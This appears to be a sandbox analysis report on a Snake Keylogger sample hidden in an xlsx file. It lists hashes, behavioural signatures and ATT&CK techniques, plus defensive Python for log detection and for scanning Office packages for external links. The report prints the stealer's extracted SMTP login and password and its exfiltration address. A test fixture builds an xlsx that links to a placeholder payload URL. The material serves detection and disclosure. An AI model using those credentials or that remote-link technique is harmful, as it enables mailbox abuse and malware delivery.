General

  • Target

    88160011B.xlsx

  • Size

    39KB

  • Sample

    220705-phvnhsahh2

  • MD5

    bb45f31acbfa03dcf30c1ef037a607e2

  • SHA1

    4539a5f55990c8490f39d0724e372ba66bdbf903

  • SHA256

    4da0fa732b3cb2b77f92db9ed169eae7606d5646aa38dbaf9667565556b3e223

  • SHA512

    5290df186c6312a68bb81429a19bb8eee06b71bdbe5b9d7e1ebc4ceca87ef7021d463b2a38f1e9388859fc63a6bd112e6f3f358ff251f0ffdae8e9ffd420bf62

Malware Config

Extracted

Family

snakekeylogger

Credentials

  • Protocol: smtp
  • Host: mail.stilltech.ro
  • Port: 587
  • Username: office@stilltech.ro
  • Password: eurobit555ro
  • Email To: graceunlimited153@gmail.com
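The extracted config gives a defender three usable network indicators: the submission server the stealer authenticates to (mail.stilltech.ro:587), the mailbox it sends from (office@stilltech.ro, which the stealer uses as its SMTP login) and the address the harvested data is delivered to (graceunlimited153@gmail.com). The following is an added example, not part of the sandbox report, that runs those indicators over Zeek logs. It assumes JSON-formatted Zeek dns, conn and smtp records that each carry a `_path` field (the json-streaming-logs package adds it; plain Zeek JSON output does not), and the log lines, IPs and timestamps are constructed for the example.

```python
import json

# Indicators from the extracted Snake Keylogger config above.
EXFIL_HOST = "mail.stilltech.ro"
EXFIL_PORT = 587
EXFIL_SENDER = "office@stilltech.ro"
EXFIL_RECIPIENT = "graceunlimited153@gmail.com"

# Constructed sample: JSON-formatted Zeek dns, conn and smtp records, each with a
# "_path" field (an assumption: the json-streaming-logs package adds it; plain
# Zeek JSON output does not). Hosts, IPs and timestamps are made up.
SAMPLE_LOG = """\
{"_path":"dns","ts":1657000000.1,"id.orig_h":"10.0.0.25","query":"www.example.com","answers":["93.184.216.34"]}
{"_path":"dns","ts":1657000001.2,"id.orig_h":"10.0.0.25","query":"mail.stilltech.ro","answers":["198.51.100.7"]}
{"_path":"conn","ts":1657000001.5,"id.orig_h":"10.0.0.25","id.resp_h":"198.51.100.7","id.resp_p":587,"proto":"tcp","service":"smtp"}
{"_path":"smtp","ts":1657000002.0,"id.orig_h":"10.0.0.25","id.resp_h":"198.51.100.7","id.resp_p":587,"mailfrom":"office@stilltech.ro","rcptto":["graceunlimited153@gmail.com"],"subject":"Passwords","tls":false}
{"_path":"smtp","ts":1657000050.0,"id.orig_h":"10.0.0.40","id.resp_h":"192.0.2.10","id.resp_p":587,"mailfrom":"alice@corp.example","rcptto":["bob@corp.example"],"subject":"lunch","tls":true}
"""


def find_exfil(log_text):
    """Return one dict per record that matches the Snake Keylogger SMTP indicators.

    Three checks, in the order the records normally appear on the wire:
      1. dns.log: a lookup of the exfil mail host; its answers become suspect IPs.
      2. conn.log: a TCP session to a suspect IP on the submission port. This is
         the check that still fires when STARTTLS hides the SMTP envelope.
      3. smtp.log: the abused sender or the attacker's recipient in the envelope.
    """
    hits = []
    suspect_ips = set()
    for raw in log_text.splitlines():
        raw = raw.strip()
        if not raw:
            continue
        rec = json.loads(raw)
        path = rec.get("_path")
        src = rec.get("id.orig_h")
        if path == "dns":
            if rec.get("query", "").lower() == EXFIL_HOST:
                suspect_ips.update(rec.get("answers", []))
                hits.append({"path": path, "src": src, "ts": rec.get("ts"),
                             "reason": "DNS lookup of %s" % EXFIL_HOST})
        elif path == "conn":
            if rec.get("id.resp_h") in suspect_ips and rec.get("id.resp_p") == EXFIL_PORT:
                hits.append({"path": path, "src": src, "ts": rec.get("ts"),
                             "reason": "TCP/%d to %s (%s)" % (EXFIL_PORT, rec["id.resp_h"], EXFIL_HOST)})
        elif path == "smtp":
            sender = (rec.get("mailfrom") or "").lower()
            rcpts = {r.lower() for r in rec.get("rcptto") or []}
            if sender == EXFIL_SENDER or EXFIL_RECIPIENT in rcpts:
                hits.append({"path": path, "src": src, "ts": rec.get("ts"),
                             "reason": "SMTP envelope %s -> %s" % (sender, ",".join(sorted(rcpts)))})
    return hits


if __name__ == "__main__":
    for h in find_exfil(SAMPLE_LOG):
        print("%(ts)s %(src)s %(path)s: %(reason)s" % h)
```

The dns-to-conn pivot matters on port 587: a real submission session is normally upgraded with STARTTLS right after EHLO, so smtp.log may record the connection but never see MAIL FROM or RCPT TO, and the envelope check alone would miss it. The same credentials also tell the owner of stilltech.ro which mailbox to rotate, since the stealer logs in to it directly.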

Targets

    • Target

      88160011B.xlsx

    • Size

      39KB

    • MD5

      bb45f31acbfa03dcf30c1ef037a607e2

    • SHA1

      4539a5f55990c8490f39d0724e372ba66bdbf903

    • SHA256

      4da0fa732b3cb2b77f92db9ed169eae7606d5646aa38dbaf9667565556b3e223

    • SHA512

      5290df186c6312a68bb81429a19bb8eee06b71bdbe5b9d7e1ebc4ceca87ef7021d463b2a38f1e9388859fc63a6bd112e6f3f358ff251f0ffdae8e9ffd420bf62

    • Snake Keylogger

      Keylogger and Infostealer first seen in November 2020.

    • Snake Keylogger Payload

    • suricata: ET MALWARE MSIL/GenKryptik.FQRH Download Request

    • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    • Blocklisted process makes network request

    • Downloads MZ/PE file

    • Executes dropped EXE

    • Abuses OpenXML format to download file from external location

    • Loads dropped DLL

    • Uses the VBS compiler for execution

    • Accesses Microsoft Outlook profiles

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Suspicious use of SetThreadContext

    • Target

      decrypted

    • Size

      35KB

    • MD5

      3910d5d3b292f25def60bb76fbf17f9a

    • SHA1

      0f0fbab3541b7f82cf95f207293a5c0e1935f115

    • SHA256

      1edcbce9fb67ee7b09caf7a75f2f5d55ef61e3238d265b1e25fa78b8aaeb30e5

    • SHA512

      dc800cbbfedf12c57128e198c9b0d662dc680cda47159753e79914d688c7de7b177d9fc9c95b46afd9379edb2976ccb538e1c6d813e99f80c51595388e03c931

    • Snake Keylogger

      Keylogger and Infostealer first seen in November 2020.

    • Snake Keylogger Payload

    • suricata: ET MALWARE MSIL/GenKryptik.FQRH Download Request

    • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    • Blocklisted process makes network request

    • Downloads MZ/PE file

    • Executes dropped EXE

    • Abuses OpenXML format to download file from external location

    • Loads dropped DLL

    • Uses the VBS compiler for execution

    • Accesses Microsoft Outlook profiles

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Suspicious use of SetThreadContext
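The signature "Abuses OpenXML format to download file from external location" refers to the relationship files inside the xlsx package: an Office document is a ZIP, and any part can carry a `_rels/*.rels` entry whose `Target` points at a URL with `TargetMode="External"`, which the application fetches when the part loads. The following is an added example, not part of the sandbox report, that lists such relationships in a package. The xlsx it builds and the URL in it are placeholders constructed for the example; the report above does not give the download location used by this sample.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
REMOTE_SCHEMES = ("http:", "https:", "ftp:", "file:", "\\\\")


def external_rels(xlsx_bytes):
    """List every OPC relationship in the package that points outside it.

    Each part's links live in a sibling *.rels file. A relationship with
    TargetMode="External" (or a Target that is a URL or UNC path) tells the
    application to fetch that resource when the part is loaded, which is how
    an xlsx can pull a payload from a remote server. Internal relationships
    (relative paths inside the ZIP) are ignored.
    """
    found = []
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as z:
        for name in z.namelist():
            if not name.lower().endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(RELS_NS + "Relationship"):
                target = rel.get("Target", "")
                mode = rel.get("TargetMode", "Internal")
                if mode == "External" or target.lower().startswith(REMOTE_SCHEMES):
                    found.append({
                        "rels": name,
                        "id": rel.get("Id"),
                        "type": rel.get("Type", "").rsplit("/", 1)[-1],
                        "target": target,
                    })
    return found


def build_sample_xlsx():
    """Construct a minimal xlsx with one external oleObject relationship.

    Constructed for this example; the URL is a placeholder, not the one used
    by the sample in the report.
    """
    rels_ns = RELS_NS[1:-1]
    off = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
    root_rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Relationships xmlns="%s">'
        '<Relationship Id="rId1" Type="%sofficeDocument" Target="xl/workbook.xml"/>'
        '</Relationships>'
    ) % (rels_ns, off)
    sheet_rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Relationships xmlns="%s">'
        '<Relationship Id="rId1" Type="%soleObject" '
        'Target="http://example.invalid/payload.doc" TargetMode="External"/>'
        '<Relationship Id="rId2" Type="%sdrawing" Target="../drawings/drawing1.xml"/>'
        '</Relationships>'
    ) % (rels_ns, off, off)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("_rels/.rels", root_rels)
        z.writestr("xl/workbook.xml", "<workbook/>")
        z.writestr("xl/worksheets/sheet1.xml", "<worksheet/>")
        z.writestr("xl/worksheets/_rels/sheet1.xml.rels", sheet_rels)
    return buf.getvalue()


if __name__ == "__main__":
    import sys
    # Pass a path (e.g. 88160011B.xlsx) to scan a real file; otherwise the
    # constructed sample is scanned.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_xlsx()
    for r in external_rels(data):
        print("%(rels)s %(id)s %(type)s -> %(target)s" % r)
```

The scan is static, so it is safe to run on a quarantined sample, and the `type` field (oleObject, externalLink, hyperlink, image) tells you whether the link is fetched automatically on open or only on user click; an external oleObject target on a spreadsheet with no user-visible reason for one is the pattern this signature is named for.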

MITRE ATT&CK Matrix (ATT&CK v6)

  Tactic           Technique                           Hits  ID
  Execution        Scripting                           2     T1064
  Execution        Exploitation for Client Execution   2     T1203
  Defense Evasion  Scripting                           2     T1064
  Defense Evasion  Modify Registry                     2     T1112
  Discovery        Query Registry                      4     T1012
  Discovery        System Information Discovery        4     T1082
  Collection       Email Collection                    2     T1114

The Hits column is the number of signatures above that mapped to each technique. Note that the matrix is ATT&CK v6: T1064 Scripting was deprecated in v7, and on current matrices the vbc.exe execution seen here maps to the Command and Scripting Interpreter sub-techniques under T1059.
